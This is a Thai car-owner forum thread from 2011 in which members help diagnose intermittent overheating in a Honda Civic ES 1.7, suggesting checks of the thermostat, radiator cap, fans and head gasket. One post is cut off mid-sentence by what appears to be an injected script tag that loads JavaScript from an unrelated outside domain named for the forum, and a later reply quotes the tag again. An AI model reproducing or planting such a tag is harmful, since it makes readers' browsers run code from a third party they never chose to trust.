ตอบ
darkspirit32


เข้าร่วม: 29 พฤศจิกา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0
จันทร์, 10 ตุลา 2011 13:19 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ผมใช้ 1.7 exi ครับ
คือว่า รถขับแล้วความร้อนขึ้นๆลงๆ เมื่อรอบถึง 3000 รอบครับ บางทีขับอยู่ในเมืองรถติดๆก็เป็นครับ บางทีมันขึ้นเกือบถึงขีดแดงเลยครับ แล้วก็ล่วงลงมา พอมันมีอาการแล้วจะเป็นเรื่อยๆครับ พอจอดรถดูครับ น้ำมันร้อนมากจนเดือดพุดๆๆๆเลยครับ น้ำบางส่วนก้ดันออกมาทางหม้อพักน้ำ
เอารถไปแก้เรื่องหม้อน้ำหมดแล้ว ทั้งเปลี่ยนหม้อน้ำใหม่ เปลี่ยนพัดลม เปลี่ยนมอเตอร์พัดลม เช็คปั้ม เช็ควาล์ว ทุกปัญหาที่เกี่ยวกับหม้อน้ำจัดการหมดแล้ว แต่ก็ยังเป็นเหมือนเดิมครับ
ตอนแรกนี้ ไม่เป็นอาการนะครับ แต่ว่า ตั้งแต่ไปเปลี่ยนตู้แอร์ และเติมน้ำยาแอร์ใหม่ มันมีอาการแบบนี้ตลอดเลยครับ ไม่รู้ว่าน้ำยาแอร์มันเกี่ยวกับปัญหานี้หรือเปล่าครับ เพราะว่า เวลาขับรถพอน้ำยาแอร์มันทำงาน รถจะมีเสียงฟู่ๆ เหมือนเครื่องมันเดินด้วย
ไม่รู้ว่า อาการที่ว่านี้ มันเกี่ยวกับฝาสูบอะไรหรือเปล่าครับ ต้องเปิดฝาสูบหรือเปล่า
วานผู้รู้ช่วยหน่อยครับ หมดปัญญาแล้วจริงๆ
ได้รับคำขอบคุณจาก: pry1999  chichimori 
mong_civic


ชื่อเล่น: หม่อง

เข้าร่วม: 11 มิถุนา 2009
ตอบ: 709

Guru ES
Guru ES

ได้รับคำขอบคุณ: 672
ให้คำขอบคุณ: 377

ที่อยู่: Chonburi
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 10 ตุลา 2011 17:46 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ไปดูวาล์วน้ำก่อนครับ น้ำยาแอร์เติมมากไปก็โหลดเครื่องนะครับ
ได้รับคำขอบคุณจาก: zan  pry1999  Phetcharat  KAATO 
numxs


ชื่อเล่น: หนุ่ม

เข้าร่วม: 01 ตุลา 2009
ตอบ: 1332

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1427
ให้คำขอบคุณ: 1715

ที่อยู่: สระบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 10 ตุลา 2011 20:10 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ขอให้เจอสาเหตุใวๆแล้วกัน
yorkydog


ชื่อเล่น: เปี๊ยก

เข้าร่วม: 09 กันยา 2010
ตอบ: 1353

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1470
ให้คำขอบคุณ: 2437

ที่อยู่: ABAC บางนา. โซนสมุทรปราการ
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 10 ตุลา 2011 20:29 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เช็คที่พัดลมว่าหมุนถูกทิศทางรึเปล่าครับ เป่าเข้าหาเครื่องนะครับ ไม่ใช่เป่าออก เคยเปลี่ยนพัดลมใหม่เหมือนกันช่างต่อไม่ถูกทิศทางลม ความร้อนขึ้นๆลงๆเหมือนกัน แก้ง่ายๆครับต่อสายไฟใหม่แล้วก็ด่าช่างได้เลยครับ เช็ดดูนะครับเผื่อเป็นอาการเดียวกับผม ขอให้หายเร็วๆนะครับ
ได้รับคำขอบคุณจาก: zan  pry1999  TA-O  arthit10  future  Phetcharat  escudo 
darkspirit32


เข้าร่วม: 29 พฤศจิกา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0
อังคาร, 11 ตุลา 2011 13:17 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
จากที่คุณ mong_civic ได้บอกไว้อ่ะครับ
เรื่องน้ำยาแอร์เนี่ย โหลดเครื่อง มันหมายถึงอะไรหรอครับ ไม่เข้าใจครับ
คือ ก่อนที่จะเปลี่ยนตู้แอร์อ่ะครับ มีการเติมน้ำยาแอร์เข้าไปแล้ว มันก๊มีอาการอย่างที่บอกครับ พอเปลี่ยนตู้แอร์ก็ยังเป็นเหมือนเดิมครับ
รบกวนหน่อยครับ
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
อังคาร, 11 ตุลา 2011 14:22 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ถ้าคิดว่าเป็นที่แอร์ ลองถอดสายพานแอร์ ออกแล้วไปลองวิ่งดูว่าความร้อนยังขึ้นอยู่หรือป่าว
mark_es03


ชื่อเล่น: มาร์คกี้

เข้าร่วม: 01 กันยา 2010
ตอบ: 2301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1422
ให้คำขอบคุณ: 2183

ที่อยู่: สิบทิศเซอร์วิส
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 11 ตุลา 2011 14:25 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เอาใจช่วยคับ
darkspirit32


เข้าร่วม: 29 พฤศจิกา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0
อังคาร, 11 ตุลา 2011 14:54 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ถ้าเอาสายพานแอร์ออก แล้วเปิดแอร์ได้อยู่หรือเปล่าครับ น้ำยาแอร์ออกหรือเปล่าครับ
Thanwa


ชื่อเล่น: แจ๊ค

เข้าร่วม: 01 ธันวา 2010
ตอบ: 890

Guru ES
Guru ES

ได้รับคำขอบคุณ: 293
ให้คำขอบคุณ: 729

ที่อยู่: พิษณุโลก
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 11 ตุลา 2011 16:34 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
numxs พิมพ์ว่า:
ขอให้เจอสาเหตุใวๆแล้วกัน



เอาใจช่วยด้วนคนครับ
Dark


เข้าร่วม: 24 มิถุนา 2009
ตอบ: 383

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 408
ให้คำขอบคุณ: 10

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 11 ตุลา 2011 16:47 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ลองปิดแอร์แล้วขับรถดูครับว่าความร้อนขึ้นมั้ย ถ้าไม่ขึ้นก็น่าจะเช็คระบบแอร์ ถ้าความร้อนยังขึ้นลองเช็คสวิทต์พัดลมหม้อน้ำ กับเปลี่ยนวาว์ลน้ำพร้อมฝาหม้อน้ำครับ
darkspirit32


เข้าร่วม: 29 พฤศจิกา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0
อังคาร, 11 ตุลา 2011 19:45 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เคยลองปิดแอร์แล้วครับ แต่อาการยังเป็นเลยครับ
เคยไปเช็ค เรื่องวาล์วน้ำ ปั้มน้ำ แล้วครับ แต่ช่างบอกว่า ปกติ แต่รถใช้มามากแล้วครับ ปามาน 180000 โลแล้วครับ
คิดว่า ผมควรเปลี่ยนดีมั้ยครับ จะลองไปเปลี่ยนดูครับ แต่ฝาหม้อน้ำนี้เกี่ยวด้วยหรอครับ ยังไม่ได้เปลี่ยนเลยครับ

เคียดมากครับ เสียตังกับเรื่องนี้มากเลย
ได้รับคำขอบคุณจาก: Jasada 
bbb@es


เข้าร่วม: 14 ธันวา 2008
ตอบ: 993

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1161
ให้คำขอบคุณ: 48

ที่อยู่: ดอนเมือง-รังสิตคับ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 11 ตุลา 2011 20:35 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เสียงฟู่ๆเวลาแอร์ทำงานคือเสียงวาวล์ในตู้มันฉีดนำ้ยาคับลองเริ่มทำจากสิ่งที่เสียเงินไม่มากก่อนลองเปลี่ยนฝาหม้อนำ้ดูก่อนคับปล.ความร้อนขึ้นแล้วนำ้หายไหมอ่ะคับลองหาที่แห้งๆจอดแล้วสตารท์ดูเข็มวัดความร้อนไว้ว่าขยับไหมแล้วลองดูว่านอกจากนำ้แอร์มีอะไรหยดมาไหมลองสังเกตุดีๆคับบางทีรอยรั่วมันเลกมากอาจจะซึมตอนมีแรงดันคับค่อยๆหาคับใจเยนๆบางทีเส้นผมบังภูเขานะคับสังเกตเวลาความร้อนมันขยับอะไรมันน่าจะผิดปกติเช่นพัดลมหมุนแรงไหม-ถูกทางไหม-มีรอยรั่วไหม-นำ้ดันออกไหม
ได้รับคำขอบคุณจาก: pry1999  TA-O  future  Phetcharat  KAATO  escudo 
Saksri


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 กรกฎา 2011
ตอบ: 1401

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1462
ให้คำขอบคุณ: 360

ที่อยู่: บางทราย ชลบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 11 ตุลา 2011 21:23 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เอาใจช่วยครับ
pry1999


ชื่อเล่น: หนุ่ม

เข้าร่วม: 13 มิถุนา 2009
ตอบ: 463

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 164
ให้คำขอบคุณ: 483

ที่อยู่: Bangkok
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 11 ตุลา 2011 22:14 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เอาใจช่วยคับ หายไวๆคับ
darkspirit32


เข้าร่วม: 29 พฤศจิกา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0
พุธ, 12 ตุลา 2011 01:05 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
รบกวนอีกทีครับ ตอนนี้ งง มากๆเลยครับ
อาการขึ้นเหมือนเดิมครับ ยังไม่ได้ เปลี่ยนฝาหม้อน้ำนะครับ
วันนี้ ความร้อนขึ้น หม้อน้ำเหมือนจะระเบิดเลย น้ำมันดันออกมาจากหม้อพักน้ำอ่ะครับ น้ำหายไปประมาณครึ่งนึงครับ ไม่รู้ว่า มันผิดปกติมากน้อยเพียงใดครับ
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
พุธ, 12 ตุลา 2011 07:36 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
darkspirit32 พิมพ์ว่า:
ถ้าเอาสายพานแอร์ออก แ้ล้วเปิดแอร์ได้อยู่หรือเปล่าครับ น้ำยาแอร์ออกหรือเปล่าครับ

น้ำยาแอร์จะไม่เดิน เนื่องจากคอมแอร์ไม่ทำงานเพราะเราถอดสายพานออกครับ
darkspirit32


เข้าร่วม: 29 พฤศจิกา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0
พุธ, 12 ตุลา 2011 08:50 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
งั้น ผมว่า แอร์คงไม่เกี่ยวหละครับ เพราะว่าเคยปิดน้ำยาแอร์วิ่ง ก็ัยังคงขึ้นอยู่เหมือนเดิมครับ
ขอบคุณมากนะครับ
nakaporn


ชื่อเล่น: ต้น

เข้าร่วม: 24 มิถุนา 2009
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 912
ให้คำขอบคุณ: 0

ที่อยู่: แพรกษาใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 12 ตุลา 2011 09:07 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
รถผมก็เป็นขับมาจากอุดรถ้ารถติดไฟแดงความร้อนจะขึ้นสูงแต่ถ้ารถวิ่งลมเข้าที่กระจังหน้าแล้วก็จะลดลง พัดลมยังทำงานปกติทุกตัว ความคิดของผมนะน่าจะเป็นที่ตัวเชนเชอร์วัดความร้อนเสียส่วนวาร์วนำ้เพิ่งเปลี่ยนมาตอนแสนโล แต่ตอนนี้ก็ทนขับไปก่อนเพราะไม่มีเวลาทำ
civicIT


เข้าร่วม: 10 พฤษภาคม 2010
ตอบ: 402

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 538
ให้คำขอบคุณ: 810

ที่อยู่: มหาชัย - อ่อนนุช
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 12 ตุลา 2011 09:14 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เคยลองสตาร์ทเครื่องทิ้งไว้ แล้วดูความร้อนไหมครับว่าขึ้นไหม ไม่ต้องเปิดแอร์นะครับ ถ้าขึ้นแสดงว่าวาล์ว น้ำเปิดไม่สุดถ้าอยากรู้ต้องหาเทอร์โมมิเตอร์ เปิดฝาหม้อน้ำและเอาเทอร์โมจุมลงไป แล้วค่อยๆดูระดับน้ำกับอุณหภูมิว่าเท่าไรผมไม่แน่ใจว่าวาล์น้ำจะเปิดประมาณ 87 รึ 90 กว่าๆ ไม่แน่ใจ แต่ถ้าร้อนจัดพัดลมต้องทำงานครับ ถ้าพัดลมไม่ทำก็ดูที่สวิทช์พัดลมไฟฟ้าได้เลยครับผม
Dark


เข้าร่วม: 24 มิถุนา 2009
ตอบ: 383

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 408
ให้คำขอบคุณ: 10

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 12 ตุลา 2011 09:27 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เปลี่ยนฝาหม้อน้ำก่อนครับ ราคาไม่กี่บาท ถามว่าเกี่ยวมั้ยผมว่ามันเกี่ยวโดยตรงเลยล่ะครับ เพราะว่าฝาหม้อน้ำมีหน้าที่กักน้ำให้อยู่ในหม้อน้ำเวลาน้ำเดือด ทีนี้พอแรงดันในหม้อน้ำมากกว่าแรงดันที่ฝาหม้อน้ำรับได้ มันถึงจะปล่อยมาที่หม้อพักน้ำ เสียงฟู่ๆที่ว่าผมว่ามันเป็นเสียงน้ำเดือดครับดูที่ฝาหม้อน้ำด้วยนะครับว่ามันมีค่าแรงดันเท่าไหร่ 0.8 หรือ 1.1 ของ es ใช้ 1.1 นะครับ
ได้รับคำขอบคุณจาก: escudo 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พุธ, 12 ตุลา 2011 09:29 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
thermoswitch, วาล์วน้ำ เปลี่ยนรึยังครับ

ดูตำแหน่งของ thermoswitch, วาล์วน้ำ ตามกระทู้นี้

http://www.civicesgroup.com/forum/topic24103

เนื้อเรื่องไม่ต้องอ่านไม่เกี่ยวกับอาการของคุณ
ได้รับคำขอบคุณจาก: future  KAATO 
TA-O


ชื่อเล่น: เต๋า

เข้าร่วม: 04 ธันวา 2008
ตอบ: 638

Guru ES
Guru ES

ได้รับคำขอบคุณ: 160
ให้คำขอบคุณ: 1218

ที่อยู่: ซอยบางปูนครโครงการ2ถนนเทพารักษ์-เชียงกงบางนาช่วงเย็นๆ
ปี: 2005
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 12 ตุลา 2011 09:35 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
bbb@es พิมพ์ว่า:
เสียงฟู่ๆเวลาแอร์ทำงานคือเสียงวาวล์ในตู้มันฉีดนำ้ยาคับลองเริ่มทำจากสิ่งที่เสียเงินไม่มากก่อนลองเปลี่ยนฝาหม้อนำ้ดูก่อนคับปล.ความร้อนขึ้นแล้วนำ้หายไหมอ่ะคับลองหาที่แห้งๆจอดแล้วสตารท์ดูเข็มวัดความร้อนไว้ว่าขยับไหมแล้วลองดูว่านอกจากนำ้แอร์มีอะไรหยดมาไหมลองสังเกตุดีๆคับบางทีรอยรั่วมันเลกมากอาจจะซึมตอนมีแรงดันคับค่อยๆหาคับใจเยนๆบางทีเส้นผมบังภูเขานะคับสังเกตเวลาความร้อนมันขยับอะไรมันน่าจะผิดปกติเช่นพัดลมหมุนแรงไหม-ถูกทางไหม-มีรอยรั่วไหม-นำ้ดันออกไหม

อ่อ่ครับ มาติดตามข้อมูลครับ

ของผมอาการคล้ายๆกันแต่ไม่หนัก พอจอดรถความร้อนขึ้น เเต่พอรถวิ่ง ความร้อนลดลง

ที่ว่า พัดลมหมุนเเรงไหม นี่หมายถึงมอเตอร์เริ่มหมุนช้าลง แล้วสมควรเปลี่ยนใช่ไหมครับ

ให้เครดิต เจ้าของกระทู้ก่อนน้ะครับ ขอบคุงครับ
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พุธ, 12 ตุลา 2011 09:42 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
TA-O พิมพ์ว่า:
bbb@es พิมพ์ว่า:
เสียงฟู่ๆเวลาแอร์ทำงานคือเสียงวาวล์ในตู้มันฉีดนำ้ยาคับลองเริ่มทำจากสิ่งที่เสียเงินไม่มากก่อนลองเปลี่ยนฝาหม้อนำ้ดูก่อนคับปล.ความร้อนขึ้นแล้วนำ้หายไหมอ่ะคับลองหาที่แห้งๆจอดแล้วสตารท์ดูเข็มวัดความร้อนไว้ว่าขยับไหมแล้วลองดูว่านอกจากนำ้แอร์มีอะไรหยดมาไหมลองสังเกตุดีๆคับบางทีรอยรั่วมันเลกมากอาจจะซึมตอนมีแรงดันคับค่อยๆหาคับใจเยนๆบางทีเส้นผมบังภูเขานะคับสังเกตเวลาความร้อนมันขยับอะไรมันน่าจะผิดปกติเช่นพัดลมหมุนแรงไหม-ถูกทางไหม-มีรอยรั่วไหม-นำ้ดันออกไหม

อ่อ่ครับ มาติดตามข้อมูลครับ

ของผมอาการคล้ายๆกันแต่ไม่หนัก พอจอดรถความร้อนขึ้น เเต่พอรถวิ่ง ความร้อนลดลง

ที่ว่า พัดลมหมุนเเรงไหม นี่หมายถึงมอเตอร์เริ่มหมุนช้าลง แล้วสมควรเปลี่ยนใช่ไหมครับ

ให้เครดิต เจ้าของกระทู้ก่อนน้ะครับ ขอบคุงครับ


อาการนี้ส่วนใหญ่มอเตอร์พัดลมเสียหรือแปลงถ่านสึกเยอะ แก้ง่ายมือสองเปลี่ยนแค่ 1000+
best_ES 01


เข้าร่วม: 07 กุมภา 2009
ตอบ: 332

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 349
ให้คำขอบคุณ: 53

ที่อยู่: เพชรเกษม สาย2 ฝั่งธนฯ
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 12 ตุลา 2011 10:25 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ก่อนหน้าเคยมีปัญหาในเรื่องของความร้อนมาบ้างหรือเปล่าครับ
ลองไล่เปลี่ยนฝาหม้อน้ำ วาล์วน้ำ แล้วก็เช็คท่อยางทางเดินของน้ำดูครับว่า
น้ำไหลไปทางท่อปกติหรือเปล่า มันจะมี 2 ท่ออ่ะครับสีดำๆ
โดยที่สตาร์ททิ้งไว้จะมีสายนึงร้อนผิดปกติ อีกสายนึงจะเย็นๆหน่อยอ่ะครับ
แต่ระดับอุณหภูมิจะต่างกันไม่มาก
แล้วก็ค่อยไล่ไปเช็คพัดลมครับว่าพัดลมทั้งสองเป็นปกติหรือเปล่า

ของผมเท่าที่เคยเป็นนะครับ น้ำไม่ลด วาล์วน้ำ ปั๊มน้ำ ทำงานตามปกติ
น้ำไหลเวียนตามปกติครับ แต่พอวิ่งไปได้ซักครึ่งชั่วโมงที่ความเร็ว 100
พอจอดติดไฟแดงได้ซัก 1-2 นาที เข็มความร้อนเริ่มกระดิกสูงขึ้น
พอรถวิ่ง ก็จะวิ่งกลับมาที่เดิมตามปกติ หลังจากนั้นพอรถจอดก็จะขึ้นใหม่ครับ
จะเป็นอย่างนี้จนกระทั่งความร้อนขึ้นสูงไปเลย และถ้าวิ่งรถนานๆเป็นชั่วโมง
ความร้อนก็ขึ้นเลยครับ ไม่ลงทั้งๆที่รถวิ่ง สรุปอาการตอนนั้นที่รถผมเป็นคือฝาสูบโก่งครับ

ยังไงก็เอาใจช่วยนะคร้าบ ตอนนั้นของผมกว่าจะไล่แก้จบก็เป็นเดือนเหมือนกัน จนกระทั่งเจอสาเหตุ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: Phetcharat 
champcement


ชื่อเล่น: แชมป์

เข้าร่วม: 09 พฤศจิกา 2010
ตอบ: 1095

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 712
ให้คำขอบคุณ: 483

ที่อยู่: สระบุรี , นครสวรรค์
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 12 ตุลา 2011 17:25 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เช็คตามสายเข้าออกของน้ำดูครับ ว่ารั่วช่วงไหนหรือเปล่าครับ
darkspirit32


เข้าร่วม: 29 พฤศจิกา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0
พฤหัส, 13 ตุลา 2011 10:56 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ตอนนี้ เปลี่ยนฝาหม้อน้ำแล้วครับ แต่อาการยังเป็นเหมือนเดิม ตอนนี้เลยเอาเข้าอู่ไปซ่อมและเช็คอีกรอบแล้วครับ
อาการเป็นอย่างไร จะแจ้งให้อีกทีนะครับ

ขอบคุณทุกๆคนที่เข้ามาช่วยให้คำแนะนำและให้กำลังใจนะครับ
nakaporn


ชื่อเล่น: ต้น

เข้าร่วม: 24 มิถุนา 2009
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 912
ให้คำขอบคุณ: 0

ที่อยู่: แพรกษาใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 13 ตุลา 2011 14:46 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
best_ES 01 พิมพ์ว่า:
ก่อนหน้าเคยมีปัญหาในเรื่องของความร้อนมาบ้างหรือเปล่าครับ
ลองไล่เปลี่ยนฝาหม้อน้ำ วาล์วน้ำ แล้วก็เช็คท่อยางทางเดินของน้ำดูครับว่า
น้ำไหลไปทางท่อปกติหรือเปล่า มันจะมี 2 ท่ออ่ะครับสีดำๆ
โดยที่สตาร์ททิ้งไว้จะมีสายนึงร้อนผิดปกติ อีกสายนึงจะเย็นๆหน่อยอ่ะครับ
แต่ระดับอุณหภูมิจะต่างกันไม่มาก
แล้วก็ค่อยไล่ไปเช็คพัดลมครับว่าพัดลมทั้งสองเป็นปกติหรือเปล่า

ของผมเท่าที่เคยเป็นนะครับ น้ำไม่ลด วาล์วน้ำ ปั๊มน้ำ ทำงานตามปกติ
น้ำไหลเวียนตามปกติครับ แต่พอวิ่งไปได้ซักครึ่งชั่วโมงที่ความเร็ว 100
พอจอดติดไฟแดงได้ซัก 1-2 นาที เข็มความร้อนเริ่มกระดิกสูงขึ้น
พอรถวิ่ง ก็จะวิ่งกลับมาที่เดิมตามปกติ หลังจากนั้นพอรถจอดก็จะขึ้นใหม่ครับ
จะเป็นอย่างนี้จนกระทั่งความร้อนขึ้นสูงไปเลย และถ้าวิ่งรถนานๆเป็นชั่วโมง
ความร้อนก็ขึ้นเลยครับ ไม่ลงทั้งๆที่รถวิ่ง สรุปอาการตอนนั้นที่รถผมเป็นคือฝาสูบโก่งครับ

ยังไงก็เอาใจช่วยนะคร้าบ ตอนนั้นของผมกว่าจะไล่แก้จบก็เป็นเดือนเหมือนกัน จนกระทั่งเจอสาเหตุ "<script src="https://sport32news.com/civicesgroup.js">



ของผมก็เรียร้อยมาแล้วครับจากที่ได้สอบถามจากคุณ Best_01 อาการจะเหมือนกันก็เลยจัดการตรวจสอบดูโดยการนำน้ำใส่ขวดน้ำมาเปิดฝาหม้อน้ำออกแล้วคว่ำขวดน้ำใส่หม้อน้ำสตาร์ทเครื่องยนต์จนกระทั่งวาร์วนำ้เปิดสังเกตุดูว่าที่ขวดน้ำมีพองอากาศออกมาหรือเปล่าถ้ามีพองอากาศออกมาตลอดเวลาแสดงว่าฝาสูบรั่วต้องฝาดฝาสอบครับ เพราะของผมเองพึ่งจะไปเข้าอู่และตรวจสอบตามนี้เลยมันจะมีพองอากาศออกมาตลอดเวลา ตามปรกติแล้วถ้าวาร์วนำ้เปิดน้ำในหม้อน้ำจะไไม่มีพองอากาศออกมาเลย พึ่งเอาเข้าอู่ เค พี สปีดบางพลีตรงแยกกิ่งแก้ว มาตอนเที่ยงนี้เอง
ได้รับคำขอบคุณจาก: future  Phetcharat 
ICE@WIN


ชื่อเล่น: ต้น

เข้าร่วม: 21 มีนา 2010
ตอบ: 2263

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 1134

ที่อยู่: รังสิต
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 13 ตุลา 2011 14:57 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
ไล่น้ำหม้อน้ำดีหรือเปล่าคับรถผมเคยไล่น้ำหม้อน้ำไม่ดีความร้อนก็ขึ้นเหมือนกัน
MoDes


เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

ที่อยู่: สายไหม56/2 - ปทุมธานี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 13 ตุลา 2011 15:32 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
เกจวัดความร้อนพังอ่ะป่าว
future


เข้าร่วม: 24 เมษา 2009
ตอบ: 893

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1055
ให้คำขอบคุณ: 736

ที่อยู่: ลาดพร้าว 101/ ท่าเรือคลองเตย / สนามบินสุวรรณภูมิ /นครศรีธรรมราช
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 14 ตุลา 2011 08:54 - ความร้อนขึ้นๆลงๆ เกือบถึงขีดแดงแล้วก็ล่วงลงมา
มาเอาใจช่วย และก็ได้ความรู้กลับมาด้วย
ขอบคุณครับ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.